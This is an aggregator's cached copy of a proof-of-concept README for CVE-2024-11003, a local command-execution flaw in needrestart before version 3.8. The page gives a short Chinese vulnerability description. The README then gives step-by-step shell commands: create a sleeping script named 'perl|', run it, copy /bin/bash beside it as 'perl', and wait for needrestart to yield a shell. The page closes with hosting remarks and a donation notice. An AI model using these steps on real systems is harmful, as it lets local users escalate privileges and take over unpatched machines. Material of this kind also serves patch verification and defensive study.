CVE-2024-11003 PoC — needrestart 安全漏洞

Source

https://github.com/unknown-user-from/CVE-2024-11003-PoC

Associated Vulnerability

Title:needrestart 安全漏洞 (CVE-2024-11003)
Description:needrestart是liske个人开发者的一款用于检查升级后需要重新启动哪些守护进程的工具。 needrestart 3.8之前版本存在安全漏洞，该漏洞源于会将未净化的数据传递给需要安全输入的库，可能允许本地攻击者执行任意shell命令。

Description

CVE-2024-11003 Perl Poc

Readme

# CVE-2024-11003

## Steps to Exploit

### 1. Create a Perl script
Create a file named `perl|` and add the following code:

```perl
#!/usr/bin/perl

sleep(3600)
```

### 2. Make the file executable
Use the following command to make the file executable:

```bash
chmod +x perl\|
```

### 3. Run the script
Execute the script:

```bash
./perl\|
```

### 4. Copy `/bin/bash` to the same directory
Copy the `bash` binary to the same directory and rename it as `perl`:

```bash
cp /bin/bash perl
```

### 5. Wait for needrestart
Once needrestart starts, you will get a shell.

File Snapshot


 [4.0K]  /data/pocs/6c49ace2e321795edc2aa49da8abce85c866091c
└── [ 571]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!